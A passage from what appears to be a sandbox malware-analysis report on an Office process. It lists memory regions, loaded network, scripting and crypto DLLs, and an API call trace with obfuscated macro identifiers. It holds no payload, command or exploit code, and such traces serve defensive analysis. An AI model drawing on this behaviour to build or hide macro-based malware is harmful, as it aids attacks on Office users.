monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011860000" filename = "" Region: id = 672 start_va = 0x11870000 end_va = 0x1187ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011870000" filename = "" Region: id = 673 start_va = 0xfd40000 end_va = 0xfd4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fd40000" filename = "" Region: id = 674 start_va = 0x11710000 end_va = 0x1171ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011710000" filename = "" Region: id = 675 start_va = 0x11720000 end_va = 0x1172ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011720000" filename = "" Region: id = 676 start_va = 0x11730000 end_va = 0x1173ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011730000" filename = "" Region: id = 677 start_va = 0x11740000 end_va = 0x1174ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011740000" filename = "" Region: id = 678 start_va = 0x11750000 end_va = 0x1175ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011750000" filename = "" Region: id = 679 start_va = 0x11850000 end_va = 0x1185ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011850000" filename = "" Region: id = 680 start_va = 0x11860000 end_va = 0x1186ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011860000" filename = "" Region: id = 681 start_va = 0x11870000 end_va = 0x1187ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011870000" filename = "" Region: id = 682 start_va = 0x11880000 end_va = 0x1188ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011880000" filename = "" Region: id = 683 start_va = 0x11890000 end_va = 0x1189ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011890000" filename = "" Region: id = 684 start_va = 0x118a0000 end_va = 0x118affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000118a0000" filename = "" Region: id = 685 start_va = 0x7fe70000 end_va = 0x7fe7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fe70000" filename = "" Region: id = 686 start_va = 0x11cb0000 end_va = 0x11dfafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011cb0000" filename = "" Region: id = 687 start_va = 0x11e00000 end_va = 0x11f41fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011e00000" filename = "" Region: id = 688 start_va = 0x11730000 end_va = 0x1173ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011730000" filename = "" Region: id = 689 start_va = 0x11740000 end_va = 0x1174ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011740000" filename = "" Region: id = 690 start_va = 0x11750000 end_va = 0x1175ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011750000" filename = "" Region: id = 691 start_va = 0x11750000 end_va = 0x1175ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011750000" filename = "" Region: id = 692 start_va = 0x11750000 end_va = 0x1175ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011750000" filename = "" Region: id = 693 start_va = 0x11850000 end_va = 0x1185ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011850000" filename = "" Region: id = 694 start_va = 0x11860000 end_va = 0x1186ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011860000" filename = "" Region: id = 695 start_va = 0x11850000 end_va = 0x11850fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000011850000" filename = "" Region: id = 696 start_va = 0x11860000 end_va = 0x1186efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000011860000" filename = "" Region: id = 697 start_va = 0x11870000 end_va = 0x1187efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011870000" filename = "" Region: id = 698 start_va = 0x11880000 end_va = 0x1188ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011880000" filename = "" Region: id = 699 start_va = 0x11860000 end_va = 0x11860fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011860000" filename = "" Region: id = 700 start_va = 0x11880000 end_va = 0x11932fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011880000" filename = "" Region: id = 701 start_va = 0x11f50000 end_va = 0x11f5cfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000011f50000" filename = "" Region: id = 702 start_va = 0x11f60000 end_va = 0x11f6cfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000011f60000" filename = "" Region: id = 703 start_va = 0x711e0000 end_va = 0x713ecfff monitored = 0 entry_point = 0x712cacb0 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 704 start_va = 0x11f70000 end_va = 0x11f70fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "counters.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat") Region: id = 705 start_va = 0x71190000 end_va = 0x711a1fff monitored = 0 entry_point = 0x71194510 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\SysWOW64\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\syswow64\\ondemandconnroutehelper.dll") Region: id = 706 start_va = 0x71160000 end_va = 0x7118efff monitored = 0 entry_point = 0x7116bb70 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 707 start_va = 0x710c0000 end_va = 0x7115afff monitored = 0 entry_point = 0x710ff7e0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\SysWOW64\\winhttp.dll" (normalized: "c:\\windows\\syswow64\\winhttp.dll") Region: id = 708 start_va = 0x76900000 end_va = 0x76906fff monitored = 0 entry_point = 0x76901e10 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 709 start_va = 0x71070000 end_va = 0x710befff monitored = 0 entry_point = 0x7107d850 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 710 start_va = 0x71060000 end_va = 0x71067fff monitored = 0 entry_point = 0x71061fc0 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 711 start_va = 0x706c0000 end_va = 0x70743fff monitored = 0 entry_point = 0x706e6530 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 712 start_va = 0x11e00000 end_va = 0x11e0ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000011e00000" filename = "" Region: id = 713 start_va = 0x11e10000 end_va = 0x11e12fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mswsock.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\mswsock.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\mswsock.dll.mui") Region: id = 714 start_va = 0x11e20000 end_va = 0x11e2cfff monitored = 0 entry_point = 0x11e27b50 region_type = mapped_file name = "wshom.ocx" filename = "\\Windows\\SysWOW64\\wshom.ocx" (normalized: "c:\\windows\\syswow64\\wshom.ocx") Region: id = 715 start_va = 0x11940000 end_va = 0x11a3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011940000" filename = "" Region: id = 716 start_va = 0x690e0000 end_va = 0x6911afff monitored = 0 entry_point = 0x690f56aa region_type = mapped_file name = "msproof7.dll" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\msproof7.dll" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\msproof7.dll") Region: id = 717 start_va = 0x11170000 end_va = 0x11170fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "custom.dic" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\uproof\\custom.dic") Region: id = 718 start_va = 0x690c0000 end_va = 0x690d2fff monitored = 0 entry_point = 0x690c25d0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc6.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc6.dll") Region: id = 719 start_va = 0x68c40000 end_va = 0x68c53fff monitored = 0 entry_point = 0x68c43c10 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc.dll") Region: id = 720 start_va = 0x68bd0000 end_va = 0x68c37fff monitored = 0 entry_point = 0x68bf70a0 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\SysWOW64\\webio.dll" (normalized: "c:\\windows\\syswow64\\webio.dll") Region: id = 721 start_va = 0x11170000 end_va = 0x111affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011170000" filename = "" Region: id = 722 start_va = 0x111b0000 end_va = 0x112affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000111b0000" filename = "" Region: id = 723 start_va = 0x67590000 end_va = 0x67edafff monitored = 0 entry_point = 0x6760ec48 region_type = mapped_file name = "igx.dll" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\IGX.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\igx.dll") Region: id = 724 start_va = 0x112b0000 end_va = 0x112b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000112b0000" filename = "" Region: id = 725 start_va = 0x112c0000 end_va = 0x112fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000112c0000" filename = "" Region: id = 726 start_va = 0x11300000 end_va = 0x113fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011300000" filename = "" Region: id = 727 start_va = 0x11400000 end_va = 0x1143ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011400000" filename = "" Region: id = 728 start_va = 0x11440000 end_va = 0x1153ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011440000" filename = "" Region: id = 729 start_va = 0x6fde0000 end_va = 0x6fde7fff monitored = 0 entry_point = 0x6fde1920 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll") Region: id = 730 start_va = 0x72900000 end_va = 0x72946fff monitored = 0 entry_point = 0x729158d0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll") Region: id = 731 start_va = 0x6fd70000 end_va = 0x6fdd3fff monitored = 0 entry_point = 0x6fd8afd0 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\SysWOW64\\schannel.dll" (normalized: "c:\\windows\\syswow64\\schannel.dll") Region: id = 732 start_va = 0x11540000 end_va = 0x11542fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011540000" filename = "" Region: id = 733 start_va = 0x6f960000 end_va = 0x6f96ffff monitored = 0 entry_point = 0x6f964600 region_type = mapped_file name = "mskeyprotect.dll" filename = "\\Windows\\SysWOW64\\mskeyprotect.dll" (normalized: "c:\\windows\\syswow64\\mskeyprotect.dll") Region: id = 734 start_va = 0x6f940000 end_va = 0x6f95ffff monitored = 0 entry_point = 0x6f94d120 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\SysWOW64\\ncrypt.dll" (normalized: "c:\\windows\\syswow64\\ncrypt.dll") Region: id = 735 start_va = 0x6f910000 end_va = 0x6f93bfff monitored = 0 entry_point = 0x6f92bb10 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\SysWOW64\\ntasn1.dll" (normalized: "c:\\windows\\syswow64\\ntasn1.dll") Region: id = 736 start_va = 0x11550000 end_va = 0x11550fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011550000" filename = "" Region: id = 737 start_va = 0x11540000 end_va = 0x1157ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011540000" filename = "" Region: id = 738 start_va = 0x11e20000 end_va = 0x11f1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011e20000" filename = "" Region: id = 739 start_va = 0x6f8f0000 end_va = 0x6f909fff monitored = 0 entry_point = 0x6f8ffa70 region_type = mapped_file name = "ncryptsslp.dll" filename = "\\Windows\\SysWOW64\\ncryptsslp.dll" (normalized: "c:\\windows\\syswow64\\ncryptsslp.dll") Region: id = 740 start_va = 0x11580000 end_va = 0x11589fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "crypt32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\crypt32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\crypt32.dll.mui") Region: id = 741 start_va = 0x11590000 end_va = 0x11590fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011590000" filename = "" Region: id = 742 start_va = 0x115a0000 end_va = 0x115a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000115a0000" filename = "" Region: id = 743 start_va = 0x115c0000 end_va = 0x115c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000115c0000" filename = "" Region: id = 744 start_va = 0x68ac0000 end_va = 0x68bc9fff monitored = 0 entry_point = 0x68b21e10 region_type = mapped_file name = "webservices.dll" filename = "\\Windows\\SysWOW64\\webservices.dll" (normalized: "c:\\windows\\syswow64\\webservices.dll") Region: id = 745 start_va = 0x6f8e0000 end_va = 0x6f8e7fff monitored = 0 entry_point = 0x6f8e1d70 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\SysWOW64\\dpapi.dll" (normalized: "c:\\windows\\syswow64\\dpapi.dll") Region: id = 746 start_va = 0x11590000 end_va = 0x11592fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011590000" filename = "" Region: id = 747 start_va = 0x115a0000 end_va = 0x115a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000115a0000" filename = "" Region: id = 748 start_va = 0x115d0000 end_va = 0x1160ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000115d0000" filename = "" Region: id = 749 start_va = 0x11f80000 end_va = 0x1207ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011f80000" filename = "" Region: id = 750 start_va = 0x68a50000 end_va = 0x68ab3fff monitored = 0 entry_point = 0x68a568c8 region_type = mapped_file name = "msgr8en.dll" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\PROOF\\1033\\MSGR8EN.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\proof\\1033\\msgr8en.dll") Region: id = 751 start_va = 0x689c0000 end_va = 0x68a4ffff monitored = 0 entry_point = 0x689c7345 region_type = mapped_file name = "msspell7.dll" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\PROOF\\msspell7.dll" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\proof\\msspell7.dll") Region: id = 752 start_va = 0x12080000 end_va = 0x12207fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mssp7en.lex" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\PROOF\\MSSP7EN.LEX" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\proof\\mssp7en.lex") Region: id = 753 start_va = 0x68950000 end_va = 0x689b7fff monitored = 0 entry_point = 0x6895c3f5 region_type = mapped_file name = "mscss7en.dll" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\mscss7en.dll" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\mscss7en.dll") Region: id = 754 start_va = 0x11590000 end_va = 0x11590fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "excludedictionaryen0409.lex" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\UProof\\ExcludeDictionaryEN0409.lex" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\uproof\\excludedictionaryen0409.lex") Region: id = 755 start_va = 0x688c0000 end_va = 0x68942fff monitored = 0 entry_point = 0x688cfbe4 region_type = mapped_file name = "css7data0009.dll" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\CSS7DATA0009.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\css7data0009.dll") Region: id = 756 start_va = 0x12210000 end_va = 0x12397fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mssp7en.lex" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\PROOF\\MSSP7EN.LEX" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\proof\\mssp7en.lex") Region: id = 757 start_va = 0x123a0000 end_va = 0x128fbfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "nl7models0009.dll" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\NL7MODELS0009.dll" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\nl7models0009.dll") Region: id = 758 start_va = 0x11590000 end_va = 0x11592fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mscss7cm_en.dub" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\mscss7cm_en.dub" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\mscss7cm_en.dub") Region: id = 759 start_va = 0x115a0000 end_va = 0x115bafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mscss7wre_en.dub" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\mscss7wre_en.dub" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\mscss7wre_en.dub") Region: id = 760 start_va = 0x12900000 end_va = 0x13101fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msgr8en.lex" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\PROOF\\MSGR8EN.LEX" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\proof\\msgr8en.lex") Region: id = 761 start_va = 0x11610000 end_va = 0x11610fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msgr8en.dub" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\PROOF\\msgr8en.dub" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\proof\\msgr8en.dub") Region: id = 762 start_va = 0x11620000 end_va = 0x11622fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011620000" filename = "" Region: id = 763 start_va = 0x11630000 end_va = 0x11630fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011630000" filename = "" Region: id = 764 start_va = 0x13110000 end_va = 0x131bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013110000" filename = "" Region: id = 765 start_va = 0x131c0000 end_va = 0x1326afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000131c0000" filename = "" Region: id = 766 start_va = 0x11620000 end_va = 0x11622fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011620000" filename = "" Region: id = 767 start_va = 0x11630000 end_va = 0x11630fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011630000" filename = "" Thread: id = 1 os_tid = 0x1100 Thread: id = 2 os_tid = 0x10e4 Thread: id = 3 os_tid = 0x10e0 Thread: id = 4 os_tid = 0x10dc Thread: id = 5 os_tid = 0x10d8 Thread: id = 6 os_tid = 0x10d0 Thread: id = 7 os_tid = 0x10cc Thread: id = 8 os_tid = 0x10c8 Thread: id = 9 os_tid = 0x10c4 Thread: id = 10 os_tid = 0x10c0 Thread: id = 11 os_tid = 0x10bc Thread: id = 12 os_tid = 0x10b8 Thread: id = 13 os_tid = 0x10b4 Thread: id = 14 os_tid = 0x10ac Thread: id = 15 os_tid = 0x10a8 [0103.115] DispCallFunc (pvInstance=0xcbc90d4, oVft=0x1c, cc=0x4, vtReturn=0xa, cActuals=0x0, prgvt=0x0, prgpvarg=0x0, pvargResult=0x198170) returned 0x0 [0103.254] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x1000, lpStartAddress=0x681f11d3, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x198080 | out: lpThreadId=0x198080*=0x1264) returned 0xbac [0103.255] PeekMessageA (in: lpMsg=0x198060, hWnd=0x502a4, wMsgFilterMin=0x1045, wMsgFilterMax=0x1045, wRemoveMsg=0x3 | out: lpMsg=0x198060) returned 0 [0103.394] NtdllDefWindowProc_A (hWnd=0x502a4, Msg=0x1c, wParam=0x0, lParam=0x1220) returned 0x0 [0103.449] GetActiveWindow () returned 0x0 [0103.450] CRetailMalloc_Alloc () returned 0xcacff00 [0103.450] CRetailMalloc_Realloc () returned 0xc8d5528 [0103.451] CRetailMalloc_Alloc () returned 0xc96be70 [0103.451] CRetailMalloc_Realloc () returned 0xcac3a20 [0103.452] memcpy (in: _Dst=0x197a00, _Src=0x197a28, _Size=0x4 | out: _Dst=0x197a00) returned 0x197a00 [0103.452] realloc (_Block=0x0, _Size=0x100) returned 0xaf5168 [0103.452] memcpy (in: _Dst=0xaf5168, _Src=0x197a00, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.452] memcpy (in: _Dst=0x197a10, _Src=0x197a44, _Size=0xc | out: _Dst=0x197a10) returned 0x197a10 [0103.452] realloc (_Block=0x0, _Size=0x60) returned 0xaf5270 [0103.452] memcpy (in: _Dst=0xaf5270, _Src=0x197a10, _Size=0xc | out: _Dst=0xaf5270) returned 0xaf5270 [0103.452] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb2dab5c, cbMultiByte=6, lpWideCharStr=0x9eb0418, cchWideChar=14 | out: lpWideCharStr="xRDaFx") returned 6 [0103.452] CRetailMalloc_Realloc () returned 0xcaa66c0 [0103.452] memcpy (in: _Dst=0xcaa8ab4, _Src=0x9eb0414, _Size=0x12 | out: _Dst=0xcaa8ab4) returned 0xcaa8ab4 [0103.452] memcpy (in: _Dst=0xaf5168, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.452] memcpy (in: _Dst=0xaf5168, _Src=0x197a28, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.453] memcpy (in: _Dst=0xaf5168, _Src=0x197894, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.453] memcpy (in: _Dst=0xaf5168, _Src=0x197a28, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.453] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9d1076e, cbMultiByte=7, lpWideCharStr=0x197658, cchWideChar=6 | out: lpWideCharStr="Value") returned 0 [0103.453] CRetailMalloc_Realloc () returned 0xc881880 [0103.453] wcscpy_s (in: _Destination=0xcaa8acc, _SizeInWords=0x6, _Source="Value" | out: _Destination="Value") returned 0x0 [0103.453] memcpy (in: _Dst=0xaf5168, _Src=0x197a28, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.453] CRetailMalloc_Realloc () returned 0xc8909f8 [0103.453] memcpy (in: _Dst=0xaf5168, _Src=0x197894, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.453] memcpy (in: _Dst=0xaf5168, _Src=0x197a28, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.456] memcpy (in: _Dst=0x197904, _Src=0x197978, _Size=0x8 | out: _Dst=0x197904) returned 0x197904 [0103.456] memcpy (in: _Dst=0xcace238, _Src=0x197904, _Size=0x8 | out: _Dst=0xcace238) returned 0xcace238 [0103.456] memcpy (in: _Dst=0xaf5270, _Src=0xaf5270, _Size=0xc | out: _Dst=0xaf5270) returned 0xaf5270 [0103.456] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb2dab8c, cbMultiByte=11, lpWideCharStr=0x9eb1612, cchWideChar=24 | out: lpWideCharStr="OXjiKVcaoJ0") returned 11 [0103.456] memcpy (in: _Dst=0xcaa8adc, _Src=0x9eb160e, _Size=0x1c | out: _Dst=0xcaa8adc) returned 0xcaa8adc [0103.456] memcpy (in: _Dst=0xaf5168, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.456] memcpy (in: _Dst=0xaf5168, _Src=0x197a28, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.457] memcpy (in: _Dst=0xaf5168, _Src=0x197894, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.457] memcpy (in: _Dst=0xaf5168, _Src=0x197a28, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.457] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9d1076e, cbMultiByte=7, lpWideCharStr=0x197658, cchWideChar=6 | out: lpWideCharStr="Value") returned 0 [0103.457] memcpy (in: _Dst=0xaf5168, _Src=0x197a28, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.457] memcpy (in: _Dst=0xaf5168, _Src=0x197894, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.457] memcpy (in: _Dst=0xaf5168, _Src=0x197a28, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.457] memcpy (in: _Dst=0xaf5168, _Src=0x197a28, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.458] memcpy (in: _Dst=0xaf5168, _Src=0x197894, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.458] memcpy (in: _Dst=0xaf5168, _Src=0x197a28, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.458] memcpy (in: _Dst=0xaf516c, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xaf516c) returned 0xaf516c [0103.458] memcpy (in: _Dst=0xaf5168, _Src=0x197a08, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.458] memcpy (in: _Dst=0xaf5168, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.458] memcpy (in: _Dst=0xaf5168, _Src=0x197a28, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.459] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9d52cbe, cbMultiByte=7, lpWideCharStr=0x197844, cchWideChar=8 | out: lpWideCharStr="VarPtr") returned 7 [0103.459] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9d106fa, cbMultiByte=7, lpWideCharStr=0x1978a4, cchWideChar=8 | out: lpWideCharStr="VarPtr") returned 7 [0103.460] CRetailMalloc_Realloc () returned 0xca9bc98 [0103.460] CRetailMalloc_Realloc () returned 0xc8463d0 [0103.461] CRetailMalloc_Realloc () returned 0xc8925d0 [0103.461] CRetailMalloc_Realloc () returned 0xc8232e8 [0103.461] CRetailMalloc_Realloc () returned 0xcaa2f68 [0103.461] memcpy (in: _Dst=0xaf5168, _Src=0x197a28, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.462] memcpy (in: _Dst=0xaf5168, _Src=0x197a28, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.462] memcpy (in: _Dst=0xaf516c, _Src=0x197a28, _Size=0x4 | out: _Dst=0xaf516c) returned 0xaf516c [0103.462] memcpy (in: _Dst=0xaf5170, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xaf5170) returned 0xaf5170 [0103.462] memcpy (in: _Dst=0xaf5174, _Src=0x197a28, _Size=0x4 | out: _Dst=0xaf5174) returned 0xaf5174 [0103.462] memcpy (in: _Dst=0xaf5174, _Src=0x197a28, _Size=0x4 | out: _Dst=0xaf5174) returned 0xaf5174 [0103.462] CRetailMalloc_Realloc () returned 0xc89c000 [0103.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb2dac34, cbMultiByte=9, lpWideCharStr=0x9eb3be2, cchWideChar=20 | out: lpWideCharStr="NGPqAkxDc") returned 9 [0103.462] memcpy (in: _Dst=0xcaa8afc, _Src=0x9eb3bde, _Size=0x18 | out: _Dst=0xcaa8afc) returned 0xcaa8afc [0103.462] memcpy (in: _Dst=0xaf5168, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.463] memcpy (in: _Dst=0xaf5168, _Src=0x197a28, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0103.463] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb2dac48, cbMultiByte=9, lpWideCharStr=0x9eb3f96, cchWideChar=20 | out: lpWideCharStr="WDyNRey8_") returned 9 [0103.463] memcpy (in: _Dst=0xcaa8b18, _Src=0x9eb3f92, _Size=0x18 | out: _Dst=0xcaa8b18) returned 0xcaa8b18 [0103.463] memcpy (in: _Dst=0xaf516c, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xaf516c) returned 0xaf516c [0103.465] memcpy (in: _Dst=0xaf516c, _Src=0x197a28, _Size=0x4 | out: _Dst=0xaf516c) returned 0xaf516c [0103.465] memcpy (in: _Dst=0xaf5170, _Src=0x197894, _Size=0x4 | out: _Dst=0xaf5170) returned 0xaf5170 [0103.465] memcpy (in: 